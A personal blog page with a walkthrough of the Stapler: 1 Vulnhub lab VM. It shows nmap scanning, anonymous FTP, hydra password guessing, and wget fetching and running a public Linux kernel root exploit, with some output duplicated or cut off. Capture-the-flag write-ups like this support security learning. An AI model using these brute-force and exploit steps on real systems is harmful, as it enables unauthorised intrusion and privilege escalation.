<!DOCTYPE html>
< html >
< head >
< meta charset = "utf-8" >
< script type = "text/javascript" >
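// Force HTTPS for the production host only.
// NOTE(review): this runs after the page (and the scripts around it) has already been
// fetched over plain HTTP, so it only upgrades later navigation; a server-side redirect
// plus a Strict-Transport-Security header is the control that protects the first request.
var host = "paul.walko.org";
// `host` (not `hostname`) includes any explicit port, so a dev server on another
// port is deliberately left untouched.
if (host == window.location.host && window.location.protocol != "https:") {
  // Assigning the protocol navigates to the same URL over HTTPS; use the same
  // "https:" spelling as the comparison above.
  window.location.protocol = "https:";
}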
< / script >
< script >
// Google Analytics (analytics.js) bootstrap, expanded from the official minified snippet.
// NOTE(review): the loader is injected dynamically, so it cannot carry an `integrity`
// attribute; if a CSP is ever added, constrain it via script-src instead.
(function (win, doc, tagName, scriptUrl, globalName) {
  // Tell analytics.js which global holds the command queue.
  win['GoogleAnalyticsObject'] = globalName;
  // Stub that queues ga(...) calls until analytics.js loads and drains the queue.
  win[globalName] = win[globalName] || function () {
    (win[globalName].q = win[globalName].q || []).push(arguments);
  };
  // Load timestamp, read by analytics.js.
  win[globalName].l = 1 * new Date();
  var loader = doc.createElement(tagName);
  var firstScript = doc.getElementsByTagName(tagName)[0];
  loader.async = 1;
  loader.src = scriptUrl;
  firstScript.parentNode.insertBefore(loader, firstScript);
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
< / script >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< meta name = "description" content = "Walkthrough for Stapler: 1 VM on Vulnhub" >
< title > Stapler: 1 Vulnhub Walkthrough< / title >
<!-- favicon -->
< link rel = "apple-touch-icon" sizes = "57x57" href = "https://paul.walko.org/favicon/apple-icon-57x57.png" >
< link rel = "apple-touch-icon" sizes = "60x60" href = "https://paul.walko.org/favicon/apple-icon-60x60.png" >
< link rel = "apple-touch-icon" sizes = "72x72" href = "https://paul.walko.org/favicon/apple-icon-72x72.png" >
< link rel = "apple-touch-icon" sizes = "76x76" href = "https://paul.walko.org/favicon/apple-icon-76x76.png" >
< link rel = "apple-touch-icon" sizes = "114x114" href = "https://paul.walko.org/favicon/apple-icon-114x114.png" >
< link rel = "apple-touch-icon" sizes = "120x120" href = "https://paul.walko.org/favicon/apple-icon-120x120.png" >
< link rel = "apple-touch-icon" sizes = "144x144" href = "https://paul.walko.org/favicon/apple-icon-144x144.png" >
< link rel = "apple-touch-icon" sizes = "152x152" href = "https://paul.walko.org/favicon/apple-icon-152x152.png" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "https://paul.walko.org/favicon/apple-icon-180x180.png" >
< link rel = "icon" type = "image/png" sizes = "192x192" href = "https://paul.walko.org/favicon/android-icon-192x192.png" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "https://paul.walko.org/favicon/favicon-32x32.png" >
< link rel = "icon" type = "image/png" sizes = "96x96" href = "https://paul.walko.org/favicon/favicon-96x96.png" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "https://paul.walko.org/favicon/favicon-16x16.png" >
< link rel = "manifest" href = "https://paul.walko.org/favicon/manifest.json" >
< meta name = "msapplication-TileColor" content = "#ffffff" >
< meta name = "msapplication-TileImage" content = "/ms-icon-144x144.png" >
< meta name = "theme-color" content = "#ffffff" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/base.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/simplePagination.css" >
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/jquery.js" > < / script >
<!-- NOTE(review): the Liquid tags in this href appear unrendered, so the canonical URL is literal template text rather than the page's address; confirm the layout is processed by Jekyll. -->
< link rel = "canonical" href = " { { site.url } }{ { page.url } }" / >
<!-- [if lt IE 9]>
< script src = "https://paul.walko.org/javascripts/html5shiv.js" > < / script >
<![endif]-->
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/markdownreader.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/pygments_monokai.css" >
< link rel = "stylesheet" type = "text/css" href = "https://paul.walko.org/stylesheets/code_block.css" >
< / head >
< body >
< header id = "l-header" >
< div class = "container" >
< div class = "row logo" >
< div class = "col-lg-7" >
< h1 > Paul Walko< / h1 >
< / div >
< / div >
< div class = "row navicon" >
<!-- NOTE(review): href="" reloads the current page if the menu script does not intercept the click, and an icon-only link has no accessible name; a <button type="button" aria-label="Menu"> would be the native fit — left unchanged because base.js/CSS may select on this anchor. -->
< a href = "" > < i class = "fa fa-navicon" > < / i > < / a >
< / div >
< div class = "row navbar" >
< nav class = "col-lg-8 col-md-8 col-xs-12" >
< ul class = "row" >
< li class = "col-lg-3" > < a href = "https://paul.walko.org/" > HOME< / a > < / li >
< li class = "col-lg-3" >
< ul class = "subnav" >
<!-- NOTE(review): this toggle uses href="javascript:void(0)" and is a direct child of a <ul>, where only <li> is valid; a <button type="button"> inside the parent <li> with the handler bound in script would keep it keyboard-usable and CSP-friendly — left unchanged because the site CSS/JS may depend on this structure. -->
< a href = "javascript:void(0)" > POSTS< / a >
< li > < a href = "https://paul.walko.org/category" > CATEGORY< / a > < / li >
< li > < a href = "https://paul.walko.org/tag" > TAG< / a > < / li >
< / ul >
< / li >
< li class = "col-lg-3" > < a href = "https://paul.walko.org/about" > ABOUT< / a > < / li >
< li class = "col-lg-3" > < a href = "https://paul.walko.org/Walko_Paul-Resume.pdf" > RÉSUMÉ< / a > < / li >
< / ul >
< / nav >
< div class = "search col-lg-4 col-md-4 col-xs-12" >
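<!-- Site search form; the submit handler below redirects to a Google "site:" query. -->
<form id="dummySearch">
  <!-- Empty label kept for existing CSS; the accessible name comes from aria-label
       because the placeholder alone is not announced reliably. -->
  <label for="search"></label>
  <!-- name was misspelled "serach"; the script reads the field by id, so this only
       affects a no-JS submission. -->
  <input id="search" name="search" type="text" placeholder="Not That Dummy Search" aria-label="Search this site">
  <!-- Decorative icon, hidden from assistive technology. -->
  <i class="fa fa-search" aria-hidden="true"></i>
</form>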
< script >
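// Site search: send the dummy search form to a Google "site:" query.
$(function () {
  $('#dummySearch').submit(function (e) {
    // Stay on the page until the redirect URL has been built.
    e.preventDefault();
    // `keyword` and `url` were implicit globals (no `var`), leaking onto window.
    var keyword = $('#search').val();
    // encodeURIComponent keeps characters such as '&', '#' or '+' in the typed
    // text from being interpreted as query-string syntax instead of search terms.
    var url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + encodeURIComponent(keyword);
    location.href = url;
  });
});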
< / script >
< / div >
< / div >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div id = "markdown-container" class = "col-lg-9" >
< header >
< p id = "postTitle" > Stapler: 1 Vulnhub Walkthrough< / p >
< ul class = "tags clearfix" >
< li > < i class = "fa fa-tag" > < / i > vulnhub< / li >
< li > < i class = "fa fa-tag" > < / i > hacking< / li >
< / ul >
< p id = "postMeta" > posted on 19 Jun 2016 under category < a href = "https://paul.walko.org/category/" > writeup< / a > < / p >
< / header >
< h1 id = "figure-out-the-ip" > Figure out the IP< / h1 >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:31:55] [~]
-> % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
< / code > < / pre >
< / div >
<p>Let’s see what’s there:</p>
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:33:59] [~]
-> % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
< / code > < / pre >
< / div >
< h1 id = "login-to-ftp" > Login to ftp< / h1 >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:34:57] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp> get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp> 221 Goodbye.
paul@archyoga [05:36:17] [~]
-> % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
< / code > < / pre >
< / div >
<p>Turns out anonymous login is allowed, and inside is a file named <code class="highlighter-rouge">note</code> which names an ftp user: <code class="highlighter-rouge">elly</code>.
I used hydra to test some common passwords and that worked out:</p>
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:39:21] [~]
-> % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
< / code > < / pre >
< / div >
<p>Now we can log in to ftp as elly using the password <code class="highlighter-rouge">ylle</code>. On the ftp server there’s a passwd file, so I can use that as a user list to test against:</p>
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:42:07] [~]
-> % ftp
ftp> open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp> get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp> 221 Goodbye.
< / code > < / pre >
< / div >
< h1 id = "login-over-ssh--exploit" > Login over ssh & exploit< / h1 >
< p > Using hydra again I discovered a login for ssh from the passwd file:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:42:36] [~]
-> % awk -F':' '{ print $1}' passwd > users
-> % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
< / code > < / pre >
< / div >
<p>Then, once I determined the release, I went over to <a href="http://exploit-db.com">http://exploit-db.com</a>, searched for “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/</p>
< p > Now for the exploit:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > paul@archyoga [05:50:44] [~]
-> % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘ 39772.zip’
39772.zip 100%[=====================================================================================================================================================================================================> ] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - ‘ 39772.zip’ saved [7115/7115]
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: ‘ 39772.zip’
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - ‘ 39772.zip’ saved [7115/7115]
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘ make_setuid’ :
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in < =60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function ‘ make_setuid’ :
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in < =60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
< / code > < / pre >
< / div >
< p > This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.< / p >
< p > Next, the flag!< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~< (Congratulations)> ~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
< / code > < / pre >
< / div >
< p > Woo!< / p >
< / div >
< div id = "markdown-outline" class = "col-lg-3" >
< / div >
< div id = "disqus_thread" > < / div >
< script type = "text/javascript" >
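/* * * CONFIGURATION VARIABLES * * */
// Must remain a global `var`: embed.js reads window.disqus_shortname.
var disqus_shortname = 'paulwalko';
/* * * Loader (adapted from the Disqus universal embed) * * */
(function() {
  var dsq = document.createElement('script');
  dsq.type = 'text/javascript';
  dsq.async = true;
  // Explicit https: instead of the protocol-relative '//' so the embed script is
  // never fetched over plain HTTP if this page is ever served that way.
  dsq.src = 'https://' + disqus_shortname + '.disqus.com/embed.js';
  // Prefer <head>; fall back to <body> if it is somehow absent.
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();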
< / script >
< noscript > Please enable JavaScript to view the < a href = "https://disqus.com/?ref_noscript" rel = "nofollow" > comments powered by Disqus.< / a > < / noscript >
< / div >
< / div >
< footer id = "l-footer" >
< div class = "container" >
< div class = "row" >
< div id = "contact" class = "col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9" >
< h3 > CONTACT< / h3 >
< div class = "row" >
< address id = "address" class = "col-lg-6 col-md-6 col-sm-6" >
United States< br >
Paul Walko< br >
< / address >
< ul class = "col-lg-6 col-md-6 col-sm-6" >
< li class = "email" > < i class = "fa fa-envelope" > < / i > < a href = "mailto:paulsw.pw@gmail.com" > paulsw.pw@gmail.com< / a > < / li >
< li class = "github" > < i class = "fa fa-github" > < / i > < a href = "https://www.github.com/paulwalko" > https://www.github.com/paulwalko< / a > < / li >
< / ul >
< / div >
< / div >
< / div >
< p id = "legal" >
Copyright (c) 2015 Paul Walko | Powered by < a href = "http://jekyllrb.com" > Jekyll< / a > & < a href = "http://github.com" > GitHub< / a > | designed & built by < a href = "http://unifreak.github.io" > UniFreak< / a >
< / p >
< / div >
< / footer >
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/base.js" > < / script >
< script type = "text/javascript" src = "https://paul.walko.org/javascripts/markdownreader.js" > < / script >
< / body >
< / html >